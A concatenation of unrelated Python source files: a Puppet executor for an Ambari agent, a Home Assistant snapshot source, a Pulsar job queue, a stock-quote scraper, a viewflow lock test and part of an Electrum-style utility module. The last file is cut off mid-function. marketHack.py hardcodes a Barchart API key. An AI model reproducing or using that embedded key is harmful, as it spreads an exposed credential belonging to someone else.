logger.info("Using default puppet on the host : " + puppetbin
+ " does not exist.")
return "puppet"
def discardInstalledRepos(self):
"""
Makes agent to forget about installed repos.
So the next call of generate_repo_manifests() will definitely
install repos again
"""
self.reposInstalled = False
def generate_repo_manifests(self, command, tmpDir, modulesdir, taskId):
# Hack to only create the repo files once
manifest_list = []
if not self.reposInstalled:
repoInstaller = RepoInstaller(command, tmpDir, modulesdir, taskId, self.config)
manifest_list = repoInstaller.generate_repo_manifests()
return manifest_list
def puppetCommand(self, sitepp):
modules = self.puppetModule
puppetcommand = [self.getPuppetBinary(), "apply", "--confdir=" + modules, "--detailed-exitcodes", sitepp]
return puppetcommand
def facterLib(self):
return self.facterInstall + "/lib/"
pass
def puppetLib(self):
return self.puppetInstall + "/lib"
pass
def condenseOutput(self, stdout, stderr, retcode):
grep = self.grep
if stderr == self.NO_ERROR:
result = grep.tail(stdout, grep.OUTPUT_LAST_LINES)
else:
result = grep.grep(stdout, "fail", grep.ERROR_LAST_LINES_BEFORE, grep.ERROR_LAST_LINES_AFTER)
result = grep.cleanByTemplate(result, "warning")
if result is None: # Second try
result = grep.grep(stdout, "err", grep.ERROR_LAST_LINES_BEFORE, grep.ERROR_LAST_LINES_AFTER)
result = grep.cleanByTemplate(result, "warning")
filteredresult = grep.filterMarkup(result)
return filteredresult
def isSuccessfull(self, returncode):
return not self.last_puppet_has_been_killed and (returncode == 0 or returncode == 2)
def run_manifest(self, command, file, tmpoutfile, tmperrfile):
result = {}
taskId = 0
if command.has_key("taskId"):
taskId = command['taskId']
puppetEnv = os.environ
#Install repos
repo_manifest_list = self.generate_repo_manifests(command, self.tmpDir, self.modulesdir, taskId)
puppetFiles = list(repo_manifest_list)
puppetFiles.append(file)
#Run all puppet commands, from manifest generator and for repos installation
#Appending outputs and errors, exitcode - maximal from all
for puppetFile in puppetFiles:
self.runPuppetFile(puppetFile, result, puppetEnv, tmpoutfile, tmperrfile)
# Check if one of the puppet command fails and error out
if not self.isSuccessfull(result["exitcode"]):
break
if self.isSuccessfull(result["exitcode"]):
# Check if all the repos were installed or not and reset the flag
self.reposInstalled = True
logger.info("ExitCode : " + str(result["exitcode"]))
return result
def isJavaAvailable(self, command):
javaExecutablePath = "{0}/bin/java".format(command)
return not self.sh.run([javaExecutablePath, '-version'])['exitCode']
def runCommand(self, command, tmpoutfile, tmperrfile):
# After installing we must have jdk available for start/stop/smoke
if command['roleCommand'] != "INSTALL":
java64_home = None
if ('global' in command['configurations']) and ('java64_home' in command['configurations']['global']):
java64_home = str(command['configurations']['global']['java64_home']).strip()
if java64_home is None or not self.isJavaAvailable(java64_home):
if java64_home is None:
errMsg = "Cannot access JDK! Make sure java64_home is specified in global config"
else:
errMsg = JAVANOTVALID_MSG.format(java64_home)
return {'stdout': '', 'stderr': errMsg, 'exitcode': 1}
pass
pass
taskId = 0
if command.has_key("taskId"):
taskId = command['taskId']
siteppFileName = os.path.join(self.tmpDir, "site-" + str(taskId) + ".pp")
errMsg = manifestGenerator.generateManifest(command, siteppFileName,
self.modulesdir, self.config)
if not errMsg:
result = self.run_manifest(command, siteppFileName, tmpoutfile, tmperrfile)
else:
result = {'stdout': '', 'stderr': errMsg, 'exitcode': 1}
return result
def runPuppetFile(self, puppetFile, result, puppetEnv, tmpoutfile, tmperrfile):
""" Run the command and make sure the output gets propagated"""
puppetcommand = self.puppetCommand(puppetFile)
rubyLib = ""
if os.environ.has_key("RUBYLIB"):
rubyLib = os.environ["RUBYLIB"]
logger.debug("RUBYLIB from Env " + rubyLib)
if not (self.facterLib() in rubyLib):
rubyLib = rubyLib + ":" + self.facterLib()
if not (self.puppetLib() in rubyLib):
rubyLib = rubyLib + ":" + self.puppetLib()
tmpout = open(tmpoutfile, 'w')
tmperr = open(tmperrfile, 'w')
puppetEnv["RUBYLIB"] = rubyLib
puppetEnv = self.configureEnviron(puppetEnv)
logger.debug("Setting RUBYLIB as: " + rubyLib)
logger.info("Running command " + pprint.pformat(puppetcommand))
puppet = self.lauch_puppet_subprocess(puppetcommand, tmpout, tmperr, puppetEnv)
logger.info("Command started with PID: " + str(puppet.pid))
logger.debug("Launching watchdog thread")
self.event.clear()
self.last_puppet_has_been_killed = False
thread = Thread(target = self.puppet_watchdog_func, args = (puppet, ))
thread.start()
# Waiting for process to finished or killed
puppet.communicate()
self.event.set()
thread.join()
# Building results
error = self.NO_ERROR
returncode = 0
if not self.isSuccessfull(puppet.returncode):
returncode = puppet.returncode
error = open(tmperrfile, 'r').read()
logging.error("Error running puppet: \n" + str(error))
pass
if self.last_puppet_has_been_killed:
error = str(error) + "\n Puppet has been killed due to timeout"
returncode = 999
if result.has_key("stderr"):
result["stderr"] = result["stderr"] + os.linesep + str(error)
else:
result["stderr"] = str(error)
puppetOutput = open(tmpoutfile, 'r').read()
logger.debug("Output from puppet :\n" + puppetOutput)
logger.info("Puppet execution process with pid %s exited with code %s." %
(str(puppet.pid), str(returncode)))
if result.has_key("exitcode"):
result["exitcode"] = max(returncode, result["exitcode"])
else:
result["exitcode"] = returncode
condensed = self.condenseOutput(puppetOutput, error, returncode)
if result.has_key("stdout"):
result["stdout"] = result["stdout"] + os.linesep + str(condensed)
else:
result["stdout"] = str(condensed)
return result
def lauch_puppet_subprocess(self, puppetcommand, tmpout, tmperr, puppetEnv):
"""
Creates subprocess with given parameters. This functionality was moved to separate method
to make possible unit testing
"""
return subprocess.Popen(puppetcommand,
stdout=tmpout,
stderr=tmperr,
env=puppetEnv)
def puppet_watchdog_func(self, puppet):
self.event.wait(float(self.puppet_timeout))
if puppet.returncode is None:
logger.error("Task timed out, killing process with PID: " + str(puppet.pid))
shell.kill_process_with_children(puppet.pid)
self.last_puppet_has_been_killed = True
pass
def main():
logging.basicConfig(level=logging.DEBUG)
#test code
jsonFile = open('test.json', 'r')
jsonStr = jsonFile.read()
# Below is for testing only.
puppetInstance = PuppetExecutor("/home/centos/ambari_repo_info/ambari-agent/src/main/puppet/",
"/usr/",
"/root/workspace/puppet-install/facter-1.6.10/",
"/tmp")
jsonFile = open('test.json', 'r')
jsonStr = jsonFile.read()
parsedJson = json.loads(jsonStr)
result = puppetInstance.runCommand(parsedJson, '/tmp/out.txt', '/tmp/err.txt')
logger.debug(result)
if __name__ == '__main__':
main()
|
hasource.py
|
import os.path
from .snapshots import HASnapshot, Snapshot, AbstractSnapshot
from .config import Config
from .time import Time
from .model import SnapshotSource, CreateOptions
from typing import Optional, List, Dict
from threading import Lock, Thread
from .harequests import HaRequests
from .exceptions import LogicError
from .helpers import formatException, touch
from .exceptions import SnapshotInProgress, UploadFailed, ensureKey
from .globalinfo import GlobalInfo
from .const import SOURCE_HA
from datetime import timedelta
from io import IOBase
from requests import HTTPError
from .settings import Setting
from .password import Password
from .snapshotname import SnapshotName
class PendingSnapshot(AbstractSnapshot):
def __init__(self, name, date, snapshotType, protected, start_time):
super().__init__(
name=name,
slug="pending",
date=date,
size="pending",
source=SOURCE_HA,
snapshotType=snapshotType,
version="",
protected=protected,
retained=False,
uploadable=False,
details={})
self._failed = False
self._complete = False
self._exception = None
self._start_time = start_time
self._failed_at = None
def startTime(self):
return self._start_time
def failed(self, exception, time):
self._failed = True
self._exception = exception
self._failed_at = time
def getFailureTime(self):
return self._failed_at
def complete(self):
self._complete = True
def isComplete(self):
return self._complete
def isFailed(self):
return self._failed
def status(self):
if self._complete:
return "Created"
if self._failed:
return "Failed!"
return "Pending"
class HaSource(SnapshotSource[HASnapshot]):
"""
Stores logic for interacting with the Hass.io add-on API
"""
def __init__(self, config: Config, time: Time, ha: HaRequests, info: GlobalInfo):
super().__init__()
self.config: Config = config
self.snapshot_thread: Thread = None
self.pending_snapshot: Optional[PendingSnapshot] = None
self.pending_snapshot_error: Optional[Exception] = None
self.pending_snapshot_slug: Optional[str] = None
self.self_info = None
self.host_info = None
self.ha_info = None
self.super_info = None
self.lock: Lock = Lock()
self.time = time
self.harequests = ha
self.last_slugs = set()
self.retained = []
self.cached_retention = {}
self._info = info
self.pending_options = {}
self._temporary_extra_server = False
def runTemporaryServer(self):
return self._temporary_extra_server
def check(self) -> bool:
# determine if the pending snapshot has timed out, but not if we're still waiting for the request
pending = self.pending_snapshot
if pending is not None:
if self.snapshot_thread is None or not self.snapshot_thread.is_alive():
if self.time.now() > pending.startTime() + timedelta(seconds=self.config.get(Setting.PENDING_SNAPSHOT_TIMEOUT_SECONDS)):
self._killPending()
self.trigger()
if pending.isFailed() and self.time.now() >= pending.getFailureTime() + timedelta(seconds=self.config.get(Setting.FAILED_SNAPSHOT_TIMEOUT_SECONDS)):
self._killPending()
self.trigger()
if pending.isComplete():
self._killPending()
self.trigger()
return super().check()
def name(self) -> str:
return SOURCE_HA
def maxCount(self) -> None:
return self.config.get(Setting.MAX_SNAPSHOTS_IN_HASSIO)
def enabled(self) -> bool:
return True
def create(self, options: CreateOptions) -> HASnapshot:
self._refreshInfo()
if options.name_template is None or len(options.name_template) == 0:
options.name_template = self.config.get(Setting.SNAPSHOT_NAME)
self.info("Requesting a new snapshot")
data = self._buildSnapshotInfo(options)
with self.lock:
if self.snapshot_thread is not None and self.snapshot_thread.is_alive():
self.info("A snapshot was already in progress")
raise SnapshotInProgress()
if self.pending_snapshot is not None:
if not self.pending_snapshot.isFailed() and not self.pending_snapshot.isComplete():
raise SnapshotInProgress()
self.pending_snapshot_error = None
self.pending_snapshot_slug = None
self.pending_snapshot = None
self.snapshot_thread = Thread(target=self._requestSnapshot, args=(data), name="Snapshot Request Thread")
self.snapshot_thread.setDaemon(True)
self.snapshot_thread.start()
self.snapshot_thread.join(timeout=self.config.get(Setting.NEW_SNAPSHOT_TIMEOUT_SECONDS))
with self.lock:
if self.pending_snapshot_error is not None:
if self._isHttp400(self.pending_snapshot_error):
self.info("A snapshot was already in progress (created outside this addon)")
# A snapshot was started "outside" of the add-on, so create a stub that we'll later associate with the pending snapshot once it shows up
self.pending_snapshot = PendingSnapshot("Pending Snapshot", options.when, "Unknown", False, self.time.now())
raise SnapshotInProgress()
else:
raise self.pending_snapshot_error
elif self.pending_snapshot_slug:
# The snapshot completed while we waited, so now we should be able to just read it.
snapshot = self.harequests.snapshot(self.pending_snapshot_slug)
snapshot.setOptions(options)
return snapshot
else:
self.pending_snapshot = PendingSnapshot(data[0]['name'], options.when, data[2], data[3], self.time.now())
self.pending_snapshot.setOptions(options)
return self.pending_snapshot
def _isHttp400(self, e):
if not isinstance(e, HTTPError):
return False
return e.response.status_code == 400
def get(self) -> Dict[str, HASnapshot]:
# TODO: refresh settings here instead of during snapshot creation. maybe cache it with a timeout
slugs = set()
retained = []
snapshots: Dict[str, HASnapshot] = {}
for snapshot in self.harequests.snapshots()['snapshots']:
slug = snapshot['slug']
slugs.add(slug)
item = self.harequests.snapshot(slug)
if slug in self.pending_options:
item.setOptions(self.pending_options[slug])
snapshots[slug] = item
if item.retained():
retained.append(item.slug())
if len(slugs - self.last_slugs) > 0:
# At least one item was added since the last query
self.last_slugs = slugs
if self.pending_snapshot is not None:
self._killPending()
if self.pending_snapshot:
snapshots[self.pending_snapshot.slug()] = self.pending_snapshot
for slug in retained:
if not self.config.isRetained(slug):
self.config.setRetained(slug, False)
return snapshots
def delete(self, snapshot: Snapshot):
slug = self._validateSnapshot(snapshot).slug()
self.info("Deleting '{0}' from Home Assistant".format(snapshot.name()))
self.harequests.delete(slug)
snapshot.removeSource(self.name())
def save(self, snapshot: Snapshot, stream: IOBase) -> HASnapshot:
self.info("Downloading '{0}'".format(snapshot.name()))
self._info.upload(0)
resp = None
try:
snapshot.overrideStatus("Downloading {0}%", stream)
resp = self.harequests.upload(stream)
except Exception as e:
self.error(formatException(e))
snapshot.clearStatus()
if resp and 'slug' in resp and resp['slug'] == snapshot.slug():
self.config.setRetained(snapshot.slug(), True)
return self.harequests.snapshot(snapshot.slug())
else:
raise UploadFailed()
def read(self, snapshot: Snapshot) -> IOBase:
item = self._validateSnapshot(snapshot)
return self.harequests.download(item.slug())
def retain(self, snapshot: Snapshot, retain: bool) -> None:
item: HASnapshot = self._validateSnapshot(snapshot)
item._retained = retain
self.config.setRetained(snapshot.slug(), retain)
def init(self):
self._refreshInfo()
# check if the upgrade file is present.
self._temporary_extra_server = False
if not os.path.exists(self.config.get(Setting.INGRESS_TOKEN_FILE_PATH)):
# No upgrade file, so check if drive creds are saved.
if os.path.exists(self.config.get(Setting.CREDENTIALS_FILE_PATH)):
# its an upgrade, so add the extra server option.
self._temporary_extra_server = True
else:
# Its a new install, write the upgrde file so we never check again.
touch(self.config.get(Setting.INGRESS_TOKEN_FILE_PATH))
def refresh(self):
self._refreshInfo()
def _refreshInfo(self) -> None:
self.self_info = self.harequests.selfInfo()
self.host_info = self.harequests.info()
self.ha_info = self.harequests.haInfo()
self.super_info = self.harequests.supervisorInfo()
self.config.update(ensureKey("options", self.self_info, "addon metdata"))
self._info.ha_port = ensureKey("port", self.ha_info, "Home Assistant metadata")
self._info.ha_ssl = ensureKey("ssl", self.ha_info, "Home Assistant metadata")
self._info.addons = ensureKey("addons", self.super_info, "Supervisor metadata")
self._info.slug = ensureKey("slug", self.self_info, "addon metdata")
self._info.url = self.getAddonUrl()
self._info.addDebugInfo("self_info", self.self_info)
self._info.addDebugInfo("host_info", self.host_info)
self._info.addDebugInfo("ha_info", self.ha_info)
self._info.addDebugInfo("super_info", self.super_info)
def getAddonUrl(self):
"""
Returns the relative path to the add-on, for the purpose of linking to the add-on page from within Home Assistant.
"""
return "/hassio/ingress/" + str(self._info.slug)
def getFullAddonUrl(self):
return self._haUrl() + "hassio/ingress/" + str(self._info.slug)
def getFullRestoreLink(self):
return self._haUrl() + "hassio/snapshots"
def _haUrl(self):
if self._info.ha_ssl:
protocol = "https://"
else:
protocol = "http://"
return "".join([protocol, "{host}:", str(self._info.ha_port), "/"])
def _validateSnapshot(self, snapshot) -> HASnapshot:
item: HASnapshot = snapshot.getSource(self.name())
if not item:
raise LogicError("Requested to do something with a snapshot from Home Assistant, but the snapshot has no Home Assistant source")
return item
def _requestSnapshot(self, *args) -> None:
data = args
options: CreateOptions = data[1]
try:
slug = ensureKey("slug", self.harequests.createSnapshot(data[0]), "Hass.io's create snapshot response")
with self.lock:
self.pending_snapshot_slug = slug
self.config.setRetained(slug, options.retain_sources.get(self.name(), False))
self.pending_options[slug] = options
if self.pending_snapshot:
self.pending_snapshot.complete()
self.info("Snapshot finished")
self.trigger()
except Exception as e:
with self.lock:
if self.pending_snapshot:
self.pending_snapshot.failed(e, self.time.now())
if self._isHttp400(e):
self.warn("A snapshot was already in progress")
else:
self.error("Snapshot failed:")
self.error(formatException(e))
self.pending_snapshot_error = e
def _buildSnapshotInfo(self, options: CreateOptions):
addons: List[str] = []
for addon in self.super_info.get('addons', {}):
addons.append(addon['slug'])
request_info = {
'addons': [],
'folders': []
}
folders = ["ssl", "share", "homeassistant", "addons/local"]
type_name = "Full"
for folder in folders:
if folder not in self.config.get(Setting.EXCLUDE_FOLDERS):
request_info['folders'].append(folder)
else:
type_name = "Partial"
for addon in addons:
if addon not in self.config.get(Setting.EXCLUDE_ADDONS):
request_info['addons'].append(addon)
else:
type_name = "Partial"
if type_name == "Full":
del request_info['addons']
del request_info['folders']
protected = False
password = Password(self.config).resolve()
if password:
request_info['password'] = password
name = SnapshotName().resolve(type_name, options.name_template, self.time.toLocal(options.when), self.host_info)
request_info['name'] = name
return (request_info, options, type_name, protected)
def _killPending(self) -> None:
with self.lock:
self.pending_snapshot_error = None
self.pending_snapshot_slug = None
self.pending_snapshot = None
|
queued.py
|
import os
import multiprocessing
from six.moves import queue
import threading
import traceback
from pulsar.managers.unqueued import Manager
from logging import getLogger
log = getLogger(__name__)
STOP_SIGNAL = object()
RUN = object()
# Number of concurrent jobs used by default for
# QueueManager.
DEFAULT_NUM_CONCURRENT_JOBS = 1
JOB_FILE_COMMAND_LINE = "command_line"
class QueueManager(Manager):
"""
A job manager that queues up jobs directly (i.e. does not use an
external queuing software such PBS, SGE, etc...).
"""
manager_type = "queued_python"
def __init__(self, name, app, **kwds):
super(QueueManager, self).__init__(name, app, **kwds)
num_concurrent_jobs = kwds.get('num_concurrent_jobs', DEFAULT_NUM_CONCURRENT_JOBS)
if num_concurrent_jobs == '*':
num_concurrent_jobs = multiprocessing.cpu_count()
else:
num_concurrent_jobs = int(num_concurrent_jobs)
self._init_worker_threads(num_concurrent_jobs)
def _init_worker_threads(self, num_concurrent_jobs):
self.work_queue = queue.Queue()
self.work_threads = []
for i in range(num_concurrent_jobs):
worker = threading.Thread(target=self.run_next)
worker.daemon = True
worker.start()
self.work_threads.append(worker)
def launch(self, job_id, command_line, submit_params={}, dependencies_description=None, env=[]):
command_line = self._prepare_run(job_id, command_line, dependencies_description=dependencies_description, env=env)
try:
self._job_directory(job_id).store_metadata(JOB_FILE_COMMAND_LINE, command_line)
except Exception:
log.info("Failed to persist command line for job %s, will not be able to recover." % job_id)
self.work_queue.put((RUN, (job_id, command_line)))
def _recover_active_job(self, job_id):
command_line = self._job_directory(job_id).load_metadata(JOB_FILE_COMMAND_LINE, None)
if command_line:
self.work_queue.put((RUN, (job_id, command_line)))
else:
raise Exception("Cannot recover job with id %s" % job_id)
def shutdown(self, timeout=None):
for i in range(len(self.work_threads)):
self.work_queue.put((STOP_SIGNAL, None))
for worker in self.work_threads:
worker.join(timeout)
if worker.isAlive():
log.warn("Failed to stop worker thread [%s]" % worker)
def run_next(self):
"""
Run the next item in the queue (a job waiting to run).
"""
while 1:
(op, obj) = self.work_queue.get()
if op is STOP_SIGNAL:
return
try:
(job_id, command_line) = obj
try:
os.remove(self._job_file(job_id, JOB_FILE_COMMAND_LINE))
except Exception:
log.exception("Running command but failed to delete - command may rerun on Pulsar boot.")
# _run will not do anything if job has been cancelled.
self._run(job_id, command_line, async=False)
except:
log.warn("Uncaught exception running job with job_id %s" % job_id)
traceback.print_exc()
|
marketHack.py
|
import urllib2
import time
import getopt
import sys
import json
import csv
import os
from multiprocessing import Process, Queue
from db import Database
API_KEY = '114e933ff74d41b9f4bddeeb74c81ccd&symbol'
ITERATIONS = 5
CHUNK_SIZE = 100
SAMPLES = 98
def get_data(url, finished, counter):
try:
finished.put(urllib2.urlopen(url).read().strip())
except Exception:
print("failed retrieving url {}".format(counter))
finished.put(0)
return 0
def define_url():
fields = ''
symbolList = []
fieldList = []
with open('resources/field_list.csv', 'rb') as f:
reader = csv.reader(f)
for row in reader:
fieldList.append(row[0])
for i in range(0, len(fieldList)):
fields = fields +fieldList[i]+ ','
with open('resources/snp_constituents.csv', 'rb') as f:
reader = csv.reader(f)
for row in reader:
symbolList.append(row[0])
symbols = ['', '', '', '', '']
chunk_size = len(symbolList)/ITERATIONS
for i in range(0, chunk_size):
for offset in range(0, ITERATIONS):
symbols[offset] = symbols[offset] + symbolList[offset * chunk_size + i]+','
urls =[]
for offset in range(0, ITERATIONS):
suffix = (API_KEY, symbols[offset], fields)
urls.append('http://marketdata.websol.barchart.com/getQuote.json?apikey=%s&symbols=%s&fields=%s' % suffix)
return urls, symbolList
def create_files(urls, symbolList):
stock_data = []
stock_data_db = {}
time_stamp = time.time()
runTime = time.strftime("%Y%m%d-%H%M%S")
sample = 0
while sample<SAMPLES:
time_stamp = time.time()
finished = Queue()
processes = []
for i in range(ITERATIONS):
p = Process(target=get_data, args=(urls[i], finished, i))
p.start()
processes.append(p)
time.sleep(1)
counter = 1
while finished.qsize() < ITERATIONS:
if counter % 10 == 0:
print ("waiting for {} members to finish".format(ITERATIONS - finished.qsize()))
counter += 1
time.sleep(1)
del stock_data[:]
for i in range(0, ITERATIONS):
stock_data.append(finished.get())
for process in processes:
process.terminate()
jsons = []
for i in range(0, ITERATIONS):
jsons.append(json.loads(stock_data[i]))
results = []
status = 0
for i in range(0, ITERATIONS):
if jsons[i]["status"].values()[1] != 200:
print (jsons[i]["status"].values()[0])
status +=1
if status > 0:
continue
else:
for i in range(0, ITERATIONS):
results.append(jsons[i]["results"])
if sample == 0:
for j in range(0, len(symbolList)):
stock_data_db[symbolList[j].replace(".", "_")] = [results[0][0].keys()]
mydb = Database()
data_type = "full_single_sample"
for i in range(0, len(results[0])):
for j in range(0, ITERATIONS):
stock_data_db[results[j][i].values()[23].replace(".","_")] = results[j][i].values()
ret_val = {"data_type": data_type, "date_and_time": runTime, "time_stamp": time_stamp, "rows": stock_data_db}
mydb.insert_result(ret_val)
sample += 1
print(sample)
time.sleep(20)
print(sample)
#mydb = Database()
data_type = "raw_stock_data"
ret_val = {"data_type": data_type, "date_and_time": runTime, "time_stamp": time_stamp, "rows": stock_data_db,
"samples": SAMPLES}
#mydb.insert_result(retVal)
print("done")
return time_stamp, runTime, ret_val
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "vhc:", ["help", "characters="])
except getopth.GetoptError, err:
print (str(err))
sys.exit(2)
urls, symbolList = define_url()
create_files(urls, symbolList)
if __name__ == "__main__":
main()
|
test_lock.py
|
import os
import threading
import time
import unittest
try:
import queue
except ImportError:
import Queue as queue
import django
from django.db import connection, DatabaseError
from django.test import skipUnlessDBFeature, TransactionTestCase
from viewflow import flow, lock
from viewflow.base import Flow, this
from viewflow.exceptions import FlowLockFailed
@unittest.skipUnless('DATABASE_URL' in os.environ, 'Lock test requires specific database config')
class Test(TransactionTestCase):
class TestFlow(Flow):
start = flow.Start().Next(this.end)
end = flow.End()
def setUp(self):
self.finished = False
self.locked = False
self.process = Test.TestFlow.process_class.objects.create(flow_class=Test.TestFlow)
self.exception_queue = queue.Queue()
def run_with_lock(self, lock_impl):
try:
with lock_impl(Test.TestFlow)(Test.TestFlow, self.process.pk):
while not self.finished:
time.sleep(0.001)
except FlowLockFailed as e:
self.exception_queue.put(e)
finally:
connection.close()
def run_with_lock_and_release(self, lock_impl):
try:
with lock_impl(Test.TestFlow)(Test.TestFlow, self.process.pk):
time.sleep(0.5)
except FlowLockFailed as e:
self.exception_queue.put(e)
finally:
connection.close()
@unittest.skipIf(django.VERSION >= (1, 11), 'disabled due no migration run in dj 1.11+')
@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_locks(self):
lock_impl = lock.SelectForUpdateLock(attempts=1)
thread1 = threading.Thread(target=self.run_with_lock, args=[lock_impl])
thread2 = threading.Thread(target=self.run_with_lock, args=[lock_impl])
thread1.start()
thread2.start()
try:
self.exception_queue.get(True, 10)
except queue.Empty:
self.fail('No thread was blocked')
finally:
self.finished = True
thread1.join()
thread2.join()
@unittest.skipIf(django.VERSION >= (1, 11), 'disabled due no migration run in dj 1.11+')
@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_locks_released(self):
lock_impl = lock.SelectForUpdateLock(attempts=4)
thread1 = threading.Thread(
target=self.run_with_lock_and_release,
args=[lock_impl])
thread2 = threading.Thread(
target=self.run_with_lock_and_release,
args=[lock_impl])
thread1.start()
thread2.start()
thread1.join()
thread2.join()
try:
self.exception_queue.get(True, 1)
self.fail('Thread was blocked')
except queue.Empty:
pass
@unittest.skipIf(django.VERSION >= (1, 11), 'disabled due no migration run in dj 1.11+')
@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_lock_ignores_user_exceptions(self):
"""
Check fix for RuntimeError: generator didn't stop after throw().
https://github.com/viewflow/viewflow/pull/164
"""
def test_func():
lock_impl = lock.SelectForUpdateLock(attempts=4)
with lock_impl(Test.TestFlow)(Test.TestFlow, self.process.pk):
raise DatabaseError('Test')
with self.assertRaises(DatabaseError):
test_func()
@unittest.skipIf(django.VERSION >= (1, 11), 'disabled due no migration run in dj 1.11+')
def test_cache_lock(self):
lock_impl = lock.CacheLock(attempts=1)
thread1 = threading.Thread(target=self.run_with_lock, args=[lock_impl])
thread2 = threading.Thread(target=self.run_with_lock, args=[lock_impl])
thread1.start()
thread2.start()
try:
self.exception_queue.get(True, 10)
except queue.Empty:
self.fail('No thread was blocked')
finally:
self.finished = True
thread1.join()
thread2.join()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'CMM':8, 'mCMM':5, 'uCMM':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electron.electron'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
